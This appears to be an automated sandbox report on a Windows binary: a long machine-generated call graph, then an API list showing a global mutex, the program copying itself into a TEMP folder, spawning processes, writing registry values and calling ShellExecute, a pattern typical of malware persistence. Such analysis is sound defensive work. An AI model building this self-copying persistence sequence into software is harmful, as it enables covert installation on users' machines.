23669 5609b9 23667->23669 23667->23671 23670 5609c0 23669->23670 23670->23630 23671->23665 23671->23667 23675 559778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23671->23675 23673->23636 23674->23630 23675->23671 23676->23670 23677->23639 23678->23643 23679->23641 23680->23650 23681->23658 23682->23651 23684->23657 23685->23645 23686->23613 23692 558a5e 23687->23692 23690->23615 23691 555e8c 64 API calls 23691->23622 23693 5589a7 ___scrt_is_nonwritable_in_current_image 23692->23693 23694 5589ba 23693->23694 23696 5589da 23693->23696 23717 558b26 14 API calls __dosmaperr 23694->23717 23698 5589ec 23696->23698 23699 5589df 23696->23699 23697 5589bf 23718 554e3f 25 API calls __Getctype 23697->23718 23709 55dbd1 23698->23709 23719 558b26 14 API calls __dosmaperr 23699->23719 23704 5589fc 23720 558b26 14 API calls __dosmaperr 23704->23720 23705 558a09 __Getctype 23721 558a47 LeaveCriticalSection __Getctype 23705->23721 23708 54fd9d 23708->23615 23708->23691 23710 55dbdd ___scrt_is_nonwritable_in_current_image 23709->23710 23722 55800d EnterCriticalSection 23710->23722 23712 55dbeb 23723 55dc75 23712->23723 23717->23697 23718->23708 23719->23708 23720->23708 23721->23708 23722->23712 23731 55dc98 23723->23731 23724 55dbf8 23737 55dc31 23724->23737 23725 55dcf0 23742 55ce71 14 API calls 3 library calls 23725->23742 23727 55dcf9 23743 55ce37 14 API calls __dosmaperr 23727->23743 23730 55dd02 23730->23724 23744 55d4b8 6 API calls std::_Lockit::_Lockit 23730->23744 23731->23724 23731->23725 23731->23731 23740 55511c EnterCriticalSection 23731->23740 23741 555130 LeaveCriticalSection 23731->23741 23733 55dd21 23745 55511c EnterCriticalSection 23733->23745 23736 55dd34 23736->23724 23746 558055 LeaveCriticalSection 23737->23746 23739 5589f5 23739->23704 23739->23705 23740->23731 23741->23731 23742->23727 23743->23730 23744->23733 23745->23736 23746->23739 24462 53c4c0 71 API calls 6 library calls 24516 5311c0 26 API calls ___std_exception_copy 24463 533cc7 25 API calls 24518 5441c0 49 API calls 5 library calls 24464 5548c0 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 24519 566dc1 19 API calls __Getctype 24520 566dcc 8 API calls 24521 55d9c9 15 API calls 24467 5648ff 19 API calls 2 library calls 24566 550eeb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24470 5584ea 45 API calls 5 library calls 24471 562ce9 IsProcessorFeaturePresent 24472 564496 18 API calls 3 library calls 24473 533890 65 API calls 24525 534190 55 API calls 3 library calls 24570 567291 40 API calls std::_Locinfo::_Locinfo_ctor 24475 55e89d 39 API calls 3 library calls 24476 55cc9c 16 API calls __dosmaperr 24617 567387 11 API calls 3 library calls 24530 533d80 29 API calls 3 library calls 24618 533780 63 API calls 24619 54ff81 26 API calls 2 library calls 24620 550782 41 API calls 24479 55508a 71 API calls 2 library calls 24480 53108c std::_Init_wcout::_Init_wcout 24483 5590b1 20 API calls 24622 554fb2 15 API calls 2 library calls 24484 550ca4 45 API calls __RTC_Initialize 24579 567aa7 40 API calls 3 library calls 24580 550ea4 23 API calls std::locale::_Setgloballocale 24535 5515a3 47 API calls _unexpected 23747 5498ae 23750 5498cf 23747->23750 24060 534740 23750->24060 23751 534740 std::_Throw_Cpp_error 43 API calls 23752 549c4c 23751->23752 24064 539de0 23752->24064 23754 549c65 23755 534740 std::_Throw_Cpp_error 43 API calls 23754->23755 23756 549cc3 23755->23756 24075 531290 23756->24075 23758 549cda 23759 531290 std::_Throw_Cpp_error 25 API calls 23758->23759 23760 549ce5 23759->23760 23761 531290 std::_Throw_Cpp_error 25 API calls 23760->23761 23762 549cf0 23761->23762 23763 531290 std::_Throw_Cpp_error 25 API calls 23762->23763 23765 549cfb 23763->23765 23764 534740 std::_Throw_Cpp_error 43 API calls 23767 549ecc 23764->23767 23765->23764 23765->23765 23766 534740 std::_Throw_Cpp_error 43 API calls 23768 54a0ac 23766->23768 23767->23766 23767->23767 23769 539de0 47 API calls 23768->23769 23770 54a0c5 23769->23770 23771 534740 std::_Throw_Cpp_error 43 API calls 23770->23771 23772 54a123 23771->23772 23773 531290 std::_Throw_Cpp_error 25 API calls 23772->23773 23774 54a13a 23773->23774 23775 531290 std::_Throw_Cpp_error 25 API calls 23774->23775 23776 54a145 23775->23776 23777 531290 std::_Throw_Cpp_error 25 API calls 23776->23777 23778 54a150 23777->23778 23779 531290 std::_Throw_Cpp_error 25 API calls 23778->23779 23781 54a15b 23779->23781 23780 534740 std::_Throw_Cpp_error 43 API calls 23783 54a32c 23780->23783 23781->23780 23781->23781 23782 534740 std::_Throw_Cpp_error 43 API calls 23784 54a50c 23782->23784 23783->23782 23783->23783 23785 539de0 47 API calls 23784->23785 23786 54a525 23785->23786 23787 534740 std::_Throw_Cpp_error 43 API calls 23786->23787 23788 54a589 23787->23788 23789 531290 std::_Throw_Cpp_error 25 API calls 23788->23789 23790 54a5a0 23789->23790 23791 531290 std::_Throw_Cpp_error 25 API calls 23790->23791 23792 54a5ab 23791->23792 23793 531290 std::_Throw_Cpp_error 25 API calls 23792->23793 23794 54a5b6 23793->23794 23795 531290 std::_Throw_Cpp_error 25 API calls 23794->23795 23796 54a5c1 23795->23796 23797 534740 std::_Throw_Cpp_error 43 API calls 23796->23797 23799 54a79c 23797->23799 23798 534740 std::_Throw_Cpp_error 43 API calls 23800 54a97c 23798->23800 23799->23798 23799->23799 23801 539de0 47 API calls 23800->23801 23802 54a995 23801->23802 23803 534740 std::_Throw_Cpp_error 43 API calls 23802->23803 23804 54aa92 23803->23804 23805 531290 std::_Throw_Cpp_error 25 API calls 23804->23805 23806 54aaa9 23805->23806 23807 531290 std::_Throw_Cpp_error 25 API calls 23806->23807 23808 54aab4 23807->23808 23809 531290 std::_Throw_Cpp_error 25 API calls 23808->23809 23810 54aabf 23809->23810 23811 531290 std::_Throw_Cpp_error 25 API calls 23810->23811 23812 54aaca 23811->23812 23812->23812 23813 534740 std::_Throw_Cpp_error 43 API calls 23812->23813 23816 54ac9c 23813->23816 23814 534740 std::_Throw_Cpp_error 43 API calls 23815 54ae7c 23814->23815 23817 539de0 47 API calls 23815->23817 23816->23814 23816->23816 23818 54ae95 23817->23818 23819 534740 std::_Throw_Cpp_error 43 API calls 23818->23819 23820 54aef3 23819->23820 23821 531290 std::_Throw_Cpp_error 25 API calls 23820->23821 23822 54af0a 23821->23822 23823 531290 std::_Throw_Cpp_error 25 API calls 23822->23823 23824 54af15 23823->23824 23825 531290 std::_Throw_Cpp_error 25 API calls 23824->23825 23826 54af20 23825->23826 23827 531290 std::_Throw_Cpp_error 25 API calls 23826->23827 23828 54af2b 23827->23828 23828->23828 23829 534740 std::_Throw_Cpp_error 43 API calls 23828->23829 23830 54b0fc 23829->23830 23831 534740 std::_Throw_Cpp_error 43 API calls 23830->23831 23832 54b2dc 23831->23832 23833 539de0 47 API calls 23832->23833 23835 54b2f7 23833->23835 23834 534740 std::_Throw_Cpp_error 43 API calls 23836 54b4a3 23834->23836 23835->23834 23835->23835 23837 531290 std::_Throw_Cpp_error 25 API calls 23836->23837 23838 54b4bb 23837->23838 23839 531290 std::_Throw_Cpp_error 25 API calls 23838->23839 23840 54b4c6 23839->23840 23841 531290 std::_Throw_Cpp_error 25 API calls 23840->23841 23842 54b4d1 23841->23842 23843 531290 std::_Throw_Cpp_error 25 API calls 23842->23843 23845 54b4dc 23843->23845 23844 534740 std::_Throw_Cpp_error 43 API calls 23846 54b6ad 23844->23846 23845->23844 23845->23845 23847 534740 std::_Throw_Cpp_error 43 API calls 23846->23847 23848 54b88c 23847->23848 23849 539de0 47 API calls 23848->23849 23852 54b8a7 23849->23852 23850 534740 std::_Throw_Cpp_error 43 API calls 23851 54ba56 23850->23851 23853 531290 std::_Throw_Cpp_error 25 API calls 23851->23853 23852->23850 23852->23852 23854 54ba6e 23853->23854 23855 531290 std::_Throw_Cpp_error 25 API calls 23854->23855 23856 54ba79 23855->23856 23857 531290 std::_Throw_Cpp_error 25 API calls 23856->23857 23858 54ba84 23857->23858 23859 531290 std::_Throw_Cpp_error 25 API calls 23858->23859 23860 54ba8f 23859->23860 23860->23860 23861 534740 std::_Throw_Cpp_error 43 API calls 23860->23861 23862 54bc70 23861->23862 23863 534740 std::_Throw_Cpp_error 43 API calls 23862->23863 23864 54be50 23863->23864 23865 539de0 47 API calls 23864->23865 23867 54be6b 23865->23867 23866 534740 std::_Throw_Cpp_error 43 API calls 23868 54c023 23866->23868 23867->23866 23867->23867 23869 531290 std::_Throw_Cpp_error 25 API calls 23868->23869 23870 54c03b 23869->23870 23871 531290 std::_Throw_Cpp_error 25 API calls 23870->23871 23872 54c046 23871->23872 23873 531290 std::_Throw_Cpp_error 25 API calls 23872->23873 23874 54c051 23873->23874 23875 531290 std::_Throw_Cpp_error 25 API calls 23874->23875 23877 54c05c 23875->23877 23876 54c643 GetModuleHandleA 23876->23877 23877->23876 23878 54c663 GetVersion 23877->23878 23879 54c6c1 23878->23879 23879->23879 23880 534740 std::_Throw_Cpp_error 43 API calls 23879->23880 23881 54c84d 23880->23881 23882 534740 std::_Throw_Cpp_error 43 API calls 23881->23882 23883 54ca30 23882->23883 23884 534740 std::_Throw_Cpp_error 43 API calls 23883->23884 23885 54cbf9 23884->23885 24082 5365f0 23885->24082 23887 54cbfe 23888 550a3c std::_Facet_Register 16 API calls 23887->23888 23889 54cc05 23888->23889 24231 557f3b 30 API calls 2 library calls 23889->24231 23891 54cc2e 23892 54cc3f 23891->23892 23893 54f1ab 23891->23893 24223 53d550 104 API calls 3 library calls 23892->24223 24283 54fedb 43 API calls 2 library calls 23893->24283 23897 54cc4b 24224 5448b0 GetUserNameA 23897->24224 23899 54cc57 24232 544730 44 API calls std::_Throw_Cpp_error 23899->24232 23901 54cc63 23902 534740 std::_Throw_Cpp_error 43 API calls 23901->23902 23903 54cdfa 23902->23903 23904 534740 std::_Throw_Cpp_error 43 API calls 23903->23904 23905 54cfe0 23904->23905 23906 539de0 47 API calls 23905->23906 23907 54cffb 23906->23907 23908 531290 std::_Throw_Cpp_error 25 API calls 23907->23908 23909 54d009 23908->23909 23910 531290 std::_Throw_Cpp_error 25 API calls 23909->23910 23911 54d014 23910->23911 23912 534740 std::_Throw_Cpp_error 43 API calls 23911->23912 23913 54d1a9 23912->23913 23914 534740 std::_Throw_Cpp_error 43 API calls 23913->23914 23915 54d213 23914->23915 24233 5452e0 27 API calls 3 library calls 23915->24233 23917 54d223 24234 543530 27 API calls 5 library calls 23917->24234 23919 54d230 23920 534740 std::_Throw_Cpp_error 43 API calls 23919->23920 23921 54d299 23920->23921 23922 534740 std::_Throw_Cpp_error 43 API calls 23921->23922 23923 54d30d 23922->23923 24235 5452e0 27 API calls 3 library calls 23923->24235 23925 54d31a 24236 543530 27 API calls 5 library calls 23925->24236 23927 54d327 23928 534740 std::_Throw_Cpp_error 43 API calls 23927->23928 23929 54d398 23928->23929 23930 534740 std::_Throw_Cpp_error 43 API calls 23929->23930 23931 54d40c 23930->23931 24237 5452e0 27 API calls 3 library calls 23931->24237 23933 54d419 24238 543530 27 API calls 5 library calls 23933->24238 23935 54d426 23936 534740 std::_Throw_Cpp_error 43 API calls 23935->23936 23937 54d498 23936->23937 23938 534740 std::_Throw_Cpp_error 43 API calls 23937->23938 23939 54d50c 23938->23939 24239 5452e0 27 API calls 3 library calls 23939->24239 23941 54d519 24240 543530 27 API calls 5 library calls 23941->24240 23943 54d526 23944 534740 std::_Throw_Cpp_error 43 API calls 23943->23944 23945 54d585 23944->23945 23946 534740 std::_Throw_Cpp_error 43 API calls 23945->23946 23947 54d5f9 23946->23947 24241 5452e0 27 API calls 3 library calls 23947->24241 23949 54d606 24242 543530 27 API calls 5 library calls 23949->24242 23951 54d613 23952 534740 std::_Throw_Cpp_error 43 API calls 23951->23952 23953 54d672 23952->23953 24243 536420 27 API calls 2 library calls 23953->24243 23955 54d684 24244 536420 27 API calls 2 library calls 23955->24244 23957 54d69c 24245 536420 27 API calls 2 library calls 23957->24245 23959 54d6b1 24246 536420 27 API calls 2 library calls 23959->24246 23961 54d6c9 24247 536420 27 API calls 2 library calls 23961->24247 23963 54d6e4 24248 536420 27 API calls 2 library calls 23963->24248 23965 54d6ff 24249 536420 27 API calls 2 library calls 23965->24249 23967 54d71a 24250 536420 27 API calls 2 library calls 23967->24250 23969 54d735 24251 536420 27 API calls 2 library calls 23969->24251 23971 54d74d 23972 531290 std::_Throw_Cpp_error 25 API calls 23971->23972 23973 54d758 23972->23973 23974 531290 std::_Throw_Cpp_error 25 API calls 23973->23974 23975 54d763 23974->23975 23976 531290 std::_Throw_Cpp_error 25 API calls 23975->23976 23977 54d76e 23976->23977 23978 531290 std::_Throw_Cpp_error 25 API calls 23977->23978 23979 54d779 23978->23979 23980 531290 std::_Throw_Cpp_error 25 API calls 23979->23980 23981 54d784 23980->23981 23982 531290 std::_Throw_Cpp_error 25 API calls 23981->23982 23983 54d78c 23982->23983 23984 531290 std::_Throw_Cpp_error 25 API calls 23983->23984 23985 54d797 23984->23985 23986 531290 std::_Throw_Cpp_error 25 API calls 23985->23986 23987 54d7a2 23986->23987 23988 531290 std::_Throw_Cpp_error 25 API calls 23987->23988 23989 54d7ad 23988->23989 23990 531290 std::_Throw_Cpp_error 25 API calls 23989->23990 23991 54d7b8 23990->23991 23992 531290 std::_Throw_Cpp_error 25 API calls 23991->23992 23993 54d7c3 23992->23993 23994 531290 std::_Throw_Cpp_error 25 API calls 23993->23994 23995 54d7ce 23994->23995 23996 531290 std::_Throw_Cpp_error 25 API calls 23995->23996 23997 54d7d9 23996->23997 23998 531290 std::_Throw_Cpp_error 25 API calls 23997->23998 23999 54d7e4 23998->23999 24000 531290 std::_Throw_Cpp_error 25 API calls 23999->24000 24001 54d7ef 24000->24001 24002 531290 std::_Throw_Cpp_error 25 API calls 24001->24002 24003 54d7fa 24002->24003 24004 531290 std::_Throw_Cpp_error 25 API calls 24003->24004 24005 54d805 24004->24005 24006 531290 std::_Throw_Cpp_error 25 API calls 24005->24006 24007 54d810 24006->24007 24008 531290 std::_Throw_Cpp_error 25 API calls 24007->24008 24009 54d81b 24008->24009 24010 531290 std::_Throw_Cpp_error 25 API calls 24009->24010 24011 54d826 24010->24011 24012 531290 std::_Throw_Cpp_error 25 API calls 24011->24012 24013 54d831 24012->24013 24014 531290 std::_Throw_Cpp_error 25 API calls 24013->24014 24015 54d83c 24014->24015 24016 531290 std::_Throw_Cpp_error 25 API calls 24015->24016 24017 54d847 24016->24017 24018 531290 std::_Throw_Cpp_error 25 API calls 24017->24018 24019 54d852 24018->24019 24020 531290 std::_Throw_Cpp_error 25 API calls 24019->24020 24021 54d85d 24020->24021 24022 531290 std::_Throw_Cpp_error 25 API calls 24021->24022 24023 54d868 24022->24023 24024 531290 std::_Throw_Cpp_error 25 API calls 24023->24024 24025 54d873 24024->24025 24026 531290 std::_Throw_Cpp_error 25 API calls 24025->24026 24027 54d87e 24026->24027 24028 531290 std::_Throw_Cpp_error 25 API calls 24027->24028 24030 54d889 24028->24030 24031 54dab7 24030->24031 24032 531290 std::_Throw_Cpp_error 25 API calls 24030->24032 24252 531820 24030->24252 24058 54daca _Yarn 24031->24058 24269 5317c0 16 API calls std::_Facet_Register 24031->24269 24032->24030 24034 534740 43 API calls std::_Throw_Cpp_error 24034->24058 24035 535610 26 API calls std::regex_error::regex_error 24035->24058 24036 551930 RaiseException CallUnexpected 24036->24058 24038 54f0ad Sleep 24282 53cb90 25 API calls 2 library calls 24038->24282 24042 5452e0 27 API calls 24042->24058 24044 539f20 39 API calls 24044->24058 24045 5363a0 27 API calls 24045->24058 24049 53adc0 27 API calls 24049->24058 24050 543530 27 API calls 24050->24058 24052 53c6e0 16 API calls 24052->24058 24053 531290 25 API calls std::_Throw_Cpp_error 24053->24058 24054 5329c0 113 API calls 24054->24058 24056 535880 49 API calls 24056->24058 24057 53f3a0 33 API calls 24057->24058 24058->24034 24058->24035 24058->24036 24058->24038 24058->24042 24058->24044 24058->24045 24058->24049 24058->24050 24058->24052 24058->24053 24058->24054 24058->24056 24058->24057 24270 536340 43 API calls std::_Throw_Cpp_error 24058->24270 24271 545140 27 API calls 24058->24271 24272 544a30 27 API calls 5 library calls 24058->24272 24273 545bd0 43 API calls 2 library calls 24058->24273 24274 5356b0 50 API calls 4 library calls 24058->24274 24275 534780 59 API calls 3 library calls 24058->24275 24276 53cb40 25 API calls 2 library calls 24058->24276 24277 531330 53 API calls __wsopen_s 24058->24277 24278 5566fe 24058->24278 24281 53cb90 25 API calls 2 library calls 24058->24281 24061 534763 24060->24061 24061->24061 24062 531820 std::_Throw_Cpp_error 43 API calls 24061->24062 24063 534775 24062->24063 24063->23751 24065 539df6 24064->24065 24066 539df8 RegOpenKeyExA 24064->24066 24065->24066 24067 539e13 RegQueryValueExA 24066->24067 24068 539e4b 24066->24068 24070 539e66 RegCloseKey 24067->24070 24071 539e45 RegCloseKey 24067->24071 24068->23754 24072 539e90 24070->24072 24071->24068 24072->24072 24073 531820 std::_Throw_Cpp_error 43 API calls 24072->24073 24074 539ea8 24073->24074 24074->23754 24076 53129b 24075->24076 24077 5312b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24075->24077 24076->24077 24284 554e4f 25 API calls __Getctype 24076->24284 24077->23758 24083 53664f 24082->24083 24084 531820 std::_Throw_Cpp_error 43 API calls 24083->24084 24085 5367ae 24084->24085 24285 539c00 24085->24285 24087 5367bf CreateMutexA 24088 5367ff std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24087->24088 24089 536871 GetLastError 24088->24089 24090 538b8f 24088->24090 24091 536867 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24088->24091 24092 536882 GetEnvironmentVariableA 24089->24092 24093 538b94 24089->24093 24311 554e4f 25 API calls __Getctype 24090->24311 24091->24089 24098 5368ce 24092->24098 24095 5566fe 23 API calls 24093->24095 24096 538b9b 24095->24096 24312 554e4f 25 API calls __Getctype 24096->24312 24099 531820 std::_Throw_Cpp_error 43 API calls 24098->24099 24101 536a36 24099->24101 24100 534740 std::_Throw_Cpp_error 43 API calls 24102 538bc5 24100->24102 24106 531820 std::_Throw_Cpp_error 43 API calls 24101->24106 24313 5363c0 27 API calls 24102->24313 24104 538bd9 24314 5363a0 27 API calls 24104->24314 24108 536a6d 24106->24108 24107 538bf2 24110 538bfc ShellExecuteA 24107->24110 24298 533190 27 API calls 3 library calls 24108->24298 24112 531290 std::_Throw_Cpp_error 25 API calls 24110->24112 24111 536a7c 24299 536420 27 API calls 2 library calls 24111->24299 24114 538c15 24112->24114 24115 531290 std::_Throw_Cpp_error 25 API calls 24114->24115 24116 538c20 24115->24116 24119 531290 std::_Throw_Cpp_error 25 API calls 24116->24119 24117 536aba std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24117->24096 24118 536b6b CreateDirectoryA GetModuleFileNameA 24117->24118 24120 536b61 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24117->24120 24121 536b22 24117->24121 24123 536bbe 24118->24123 24122 538c2b 24119->24122 24120->24118 24121->24096 24121->24117 24121->24120 24124 531290 std::_Throw_Cpp_error 25 API calls 24122->24124 24123->24123 24126 531820 std::_Throw_Cpp_error 43 API calls 24123->24126 24125 538c36 24124->24125 24127 5566fe 23 API calls 24125->24127 24129 536d3a 24126->24129 24128 538c3d 24127->24128 24315 554e4f 25 API calls __Getctype 24128->24315 24132 531820 std::_Throw_Cpp_error 43 API calls 24129->24132 24133 536db6 24132->24133 24135 539c00 27 API calls 24133->24135 24137 536ddb 24135->24137 24300 536420 27 API calls 2 library calls 24137->24300 24140 536e19 CopyFileA 24146 536e3c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24140->24146 24147 531820 std::_Throw_Cpp_error 43 API calls 24146->24147 24149 5370c9 24147->24149 24150 531820 std::_Throw_Cpp_error 43 API calls 24149->24150 24151 53714d 24150->24151 24152 539c00 27 API calls 24151->24152 24153 537175 24152->24153 24301 536420 27 API calls 2 library calls 24153->24301 24155 5371b9 24155->24155 24157 531820 std::_Throw_Cpp_error 43 API calls 24155->24157 24158 53724d 24157->24158 24159 531820 std::_Throw_Cpp_error 43 API calls 24158->24159 24160 5373eb 24159->24160 24161 531820 std::_Throw_Cpp_error 43 API calls 24160->24161 24162 5375d3 24161->24162 24302 536420 27 API calls 2 library calls 24162->24302 24165 5375ec 24303 536420 27 API calls 2 library calls 24165->24303 24168 537602 24304 536420 27 API calls 2 library calls 24168->24304 24170 537618 24305 533190 27 API calls 3 library calls 24170->24305 24174 537627 __fread_nolock std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24175 5378cf CreateProcessA 24174->24175 24176 537917 WaitForSingleObject CloseHandle CloseHandle 24175->24176 24178 537932 24175->24178 24176->24178 24180 531820 std::_Throw_Cpp_error 43 API calls 24178->24180 24181 537ac9 24180->24181 24182 531820 std::_Throw_Cpp_error 43 API calls 24181->24182 24183 537ce3 24182->24183 24306 539eb0 RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 24183->24306 24185 537d08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24186 531820 std::_Throw_Cpp_error 43 API calls 24185->24186 24187 537f39 24186->24187 24188 531820 std::_Throw_Cpp_error 43 API calls 24187->24188 24189 537fb6 24188->24189 24190 539c00 27 API calls 24189->24190 24191 537fdb 24190->24191 24307 536420 27 API calls 2 library calls 24191->24307 24193 53801f 24194 531820 std::_Throw_Cpp_error 43 API calls 24193->24194 24195 5381bd 24194->24195 24196 531820 std::_Throw_Cpp_error 43 API calls 24195->24196 24197 5383b3 24196->24197 24308 539eb0 RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 24197->24308 24199 531290 std::_Throw_Cpp_error 25 API calls 24201 538496 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24199->24201 24200 5383de std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24200->24199 24202 531820 std::_Throw_Cpp_error 43 API calls 24201->24202 24203 538590 24202->24203 24204 531820 std::_Throw_Cpp_error 43 API calls 24203->24204 24205 538729 24204->24205 24206 531820 std::_Throw_Cpp_error 43 API calls 24205->24206 24207 5387a6 24206->24207 24309 5363c0 27 API calls 24207->24309 24209 5387bd 24310 536420 27 API calls 2 library calls 24209->24310 24211 531290 std::_Throw_Cpp_error 25 API calls 24212 538889 24211->24212 24213 531290 std::_Throw_Cpp_error 25 API calls 24212->24213 24216 538894 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24213->24216 24214 5387d6 24214->24211 24215 538b24 24215->24128 24217 538b54 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24215->24217 24216->24215 24219 538960 24216->24219 24218 531290 std::_Throw_Cpp_error 25 API calls 24217->24218 24220 538b84 24218->24220 24221 534740 std::_Throw_Cpp_error 43 API calls 24219->24221 24220->23887 24222 538ac8 24221->24222 24222->24100 24223->23897 24225 5448d0 24224->24225 24226 54490c 24224->24226 24227 531820 std::_Throw_Cpp_error 43 API calls 24225->24227 24228 531820 std::_Throw_Cpp_error 43 API calls 24226->24228 24229 544905 24227->24229 24230 544a25 24228->24230 24229->23899 24230->23899 24231->23891 24320 557ddf 45 API calls 2 library calls 24231->24320 24232->23901 24233->23917 24234->23919 24235->23925 24236->23927 24237->23933 24238->23935 24239->23941 24240->23943 24241->23949 24242->23951 24243->23955 24244->23957 24245->23959 24246->23961 24247->23963 24248->23965 24249->23967 24250->23969 24251->23971 24255 53185e 24252->24255 24257 531836 _Yarn 24252->24257 24253 531907 24323 5317b0 27 API calls std::_Throw_Cpp_error 24253->24323 24255->24253 24321 5317c0 16 API calls std::_Facet_Register 24255->24321 24257->24030 24260 5318a7 _Yarn 24261 5318e9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24260->24261 24322 554e4f 25 API calls __Getctype 24260->24322 24261->24030 24269->24058 24270->24058 24271->24058 24272->24058 24273->24058 24274->24058 24275->24058 24276->24058 24277->24058 24324 55659c 24278->24324 24281->24058 24282->24058 24286 539dd0 24285->24286 24287 539c19 24285->24287 24317 5362a0 27 API calls 24286->24317 24289 539cc7 24287->24289 24290 539dd5 24287->24290 24295 539c2e _Yarn 24287->24295 24316 5317c0 16 API calls std::_Facet_Register 24289->24316 24318 5317b0 27 API calls std::_Throw_Cpp_error 24290->24318 24292 539d0e _Yarn 24297 539d7f _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24292->24297 24319 554e4f 25 API calls __Getctype 24292->24319 24295->24087 24297->24087 24298->24111 24299->24117 24300->24140 24301->24155 24302->24165 24303->24168 24304->24170 24305->24174 24306->24185 24307->24193 24308->24200 24309->24209 24310->24214 24313->24104 24314->24107 24316->24292 24321->24260 24325 5565bc 24324->24325 24326 5565aa 24324->24326 24343 556443 24325->24343 24336 551554 GetModuleHandleW 24326->24336 24329 5565af 24329->24325 24337 556642 GetModuleHandleExW 24329->24337 24331 5565f5 24331->24058 24336->24329 24338 556684 24337->24338 24339 556661 GetProcAddress 24337->24339 24340 5565bb 24338->24340 24341 55668a FreeLibrary 24338->24341 24342 556676 24339->24342 24340->24325 24341->24340 24342->24338 24344 55644f ___scrt_is_nonwritable_in_current_image 24343->24344 24359 55800d EnterCriticalSection 24344->24359 24346 556459 24360 5564af 24346->24360 24348 556466 24364 556484 24348->24364 24351 556600 24369 55ff7d GetPEB 24351->24369 24354 55662f 24356 556642 std::locale::_Setgloballocale 3 API calls 24354->24356 24355 55660f GetPEB 24355->24354 24357 55661f GetCurrentProcess TerminateProcess 24355->24357 24358 556637 ExitProcess 24356->24358 24357->24354 24359->24346 24361 5564bb ___scrt_is_nonwritable_in_current_image 24360->24361 24363 55651c std::locale::_Setgloballocale 24361->24363 24367 55bb99 14 API calls std::locale::_Setgloballocale 24361->24367 24363->24348 24368 558055 LeaveCriticalSection 24364->24368 24366 556472 24366->24331 24366->24351 24367->24363 24368->24366 24370 55ff97 24369->24370 24371 55660a 24369->24371 24373 55d1ee 24370->24373 24371->24354 24371->24355 24376 55d16b 24373->24376 24377 55d199 24376->24377 24380 55d195 24376->24380 24377->24380 24383 55d0a4 24377->24383 24380->24371 24381 55d1b3 GetProcAddress 24381->24380 24382 55d1c3 std::_Lockit::_Lockit 24381->24382 24382->24380 24388 55d0b5 ___vcrt_InitializeCriticalSectionEx 24383->24388 24384 55d160 24384->24380 24384->24381 24385 55d0d3 LoadLibraryExW 24386 55d0ee GetLastError 24385->24386 24385->24388 24386->24388 24387 55d149 FreeLibrary 24387->24388 24388->24384 24388->24385 24388->24387 24389 55d121 LoadLibraryExW 24388->24389 24389->24388

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 005365F0 Relevance: 50.8, APIs: 13, Strings: 14, Instructions: 3518synchronizationprocessfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,Global\,00000007,?,?), ref: 005367F1
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00536871
                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 00536893
                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,0000000F,?,00000000,0056E898,00000001,?,?,?,?), ref: 00536B82
                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00536B96
                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000000), ref: 00536E2E
                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000,?), ref: 0053790D
                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0053791C
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0053792B
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00537930
                                                                                                                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00538C04
                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104,00000001,00000006), ref: 00538C7F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Create$CloseEnvironmentFileHandleVariable$CopyDirectoryErrorExecuteLastModuleMutexNameObjectProcessShellSingleWait
                                                                                                                                                                                            • String ID: " /F$Global\$TEMP$XFZ@$XFZ@7$XFZ@i6$XFZ@i6$XFZ@i6$XFZ@i6$`V$open$wuC$wuC$wuC
                                                                                                                                                                                            • API String ID: 747220738-2991300673
                                                                                                                                                                                            • Opcode ID: 01b78a726bde9690f608c25c0e09999b7137a423ea066f02e269b970c2a618a8
